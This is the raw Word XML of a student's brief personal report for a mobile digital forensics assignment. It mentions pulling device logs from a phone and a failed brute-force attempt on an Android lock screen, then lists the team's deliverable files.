      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142CC9C4" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4140C3D8" w14:textId="4F7B6A2D" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA52679" w14:textId="76C1DFE6" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B762A2" w14:textId="374A5861" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2D5682" w14:textId="785C87D3" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D39840" w14:textId="208486A0" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172D6485" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E542A1E" w14:textId="649037B5" w:rsidR="004E5562" w:rsidRPr="00171782" w:rsidRDefault="004E5562" w:rsidP="004E5562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171782">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                      PERSONAL RESERCH </w:t>
      </w:r>
      <w:r w:rsidR="00171782" w:rsidRPr="00171782">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>REPORT WORK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB4D846" w14:textId="5DD9B9FD" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3BC219" w14:textId="77777777" w:rsidR="004E5562" w:rsidRPr="00846B55" w:rsidRDefault="004E5562" w:rsidP="004E5562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E92365D" w14:textId="3449DC3D" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="004E5562">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">So personally when we are working on task then I research some topics from the internet about the tools what we used in this task, how can we break the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>password ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> how can we access  the phone so we can easily got information more so I write down as my personal report some things we used in team and some I write because of its importance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1092ED73" w14:textId="77777777" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="004E5562">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E44C87" w14:textId="77777777" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> when I started finding about the task and how to find password so I got something from the internet so I apply on phone and it gives me some information about the device like device logs and more etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F945115" w14:textId="77777777" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F47075" w14:textId="4182E45B" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">fig1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD11BA5" wp14:editId="731E8458">
            <wp:extent cx="4069080" cy="24917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4-01-12 at 06.20.21_9c57455d.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4069080" cy="2491740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C288AD1" w14:textId="77777777" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C10079" w14:textId="42715FBE" w:rsidR="004E5562" w:rsidRDefault="001A401C" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fig2</w:t>
      </w:r>
      <w:r w:rsidR="004E5562">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11EB1899" wp14:editId="28BEAC41">
            <wp:extent cx="3520440" cy="26289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4-01-12 at 06.20.21_c7582583.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3520440" cy="2628900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E7533C" w14:textId="142CD5A7" w:rsidR="004E5562" w:rsidRDefault="004E5562" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04069BCA" wp14:editId="3C4091F9">
            <wp:extent cx="3284220" cy="33070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4-01-12 at 06.20.21_cbac4c77.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3284220" cy="3307080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D1321" w14:textId="3CAADA2A" w:rsidR="001A401C" w:rsidRDefault="001A401C" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fig3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0180523B" w14:textId="32DF5429" w:rsidR="001A401C" w:rsidRDefault="001A401C" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CAC819D" w14:textId="6240D12D" w:rsidR="001A401C" w:rsidRDefault="001A401C" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with use of these details we t some information regarding the phone and also know some more </w:t>
      </w:r>
      <w:r w:rsidR="00171782">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799EB64" w14:textId="66E855C2" w:rsidR="001A401C" w:rsidRDefault="001A401C" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2EEC2F" w14:textId="486FDB24" w:rsidR="001A401C" w:rsidRDefault="001A401C" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">I also done some research on how to break password how to cracked password on android device but the phone was locked after 3-4 try and sow like waiting time for 30 second so as my point of view brute force attack is not working on </w:t>
      </w:r>
      <w:r w:rsidR="00171782">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>this device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0636C7DA" w14:textId="7E9DAC84" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F0383F" w14:textId="77AA78C3" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E7D3AA" w14:textId="15B01739" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F779FDB" w14:textId="4B3C463C" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625F560B" w14:textId="7E74D390" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E526E8" w14:textId="0C128C31" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E98FB95" w14:textId="0DF85D6C" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C24A6FE" w14:textId="75271EEF" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78DAADA8" w14:textId="78450987" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8B77DB" w14:textId="0081D11F" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F404D75" w14:textId="30E84804" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1F7D82" w14:textId="77777777" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA8C917" w14:textId="77777777" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="003C5D69">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C4587"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Annexure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0312C29F" w14:textId="01C0F5B4" w:rsidR="00E2633D" w:rsidRDefault="00E2633D" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310F85AA" w14:textId="2B3F1F32" w:rsidR="003C5D69" w:rsidRDefault="00415E55" w:rsidP="003C5D69">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00415E55">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:r w:rsidR="003C5D69" w:rsidRPr="00415E55">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of these files can be found in the</w:t>
      </w:r>
      <w:r w:rsidR="003C5D69" w:rsidRPr="00415E55">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> drive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> :  </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00415E55">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>https://uowtsd-my.sharepoint.com/:f:/r/personal/2214858_student_uwtsd_ac_uk/Documents/assignment%20files?csf=1&amp;web=1&amp;e=p2J6zI</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="007F475C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="007F475C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="007F475C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>://uowtsd-my.sharepoint.com/:f:/r/personal/2214858_student_uwtsd_ac_uk/Documents/assignment%20files?csf=1&amp;web=1&amp;e=p2J6zI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003C5D69">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="003C5D69">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B879490"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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Chain of Custody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5B2EEE"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Team C - Task 3 - Receiver.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54243966"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Team C - Task 3 - Sender.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBAEF33"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Team C - Task 4.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7735A4"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Minutes of Meeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A51C4AC"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Meeting Notes - 1.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF2CA22" w14:textId="333D9252"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 xml:space="preserve">Team Discussions/Meeting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Notes.docs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2311D4"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p>
    <w:p w14:paraId="2641576A"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Video Presentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C347EA"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Group C - Task 3 - Video Presentation.mp4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA9DA5"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Data Collection Report.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6EA146"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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Team Reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782DEE91"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Group C - Task 3 - ACCA7031 - Digital Forensics Analysis.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15261F59"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Group C - Task 4 - ACCA7031 - Mobile Digital Forensics Analysis.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D57BF"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Google Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C1FFE"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Google Sheet - Task 3 &amp; 4.xlsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56141270" w14:textId="77777777" w:rsidR="003C5D69" w:rsidRDefault="003C5D69" w:rsidP="003C5D69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="6022C5EA">
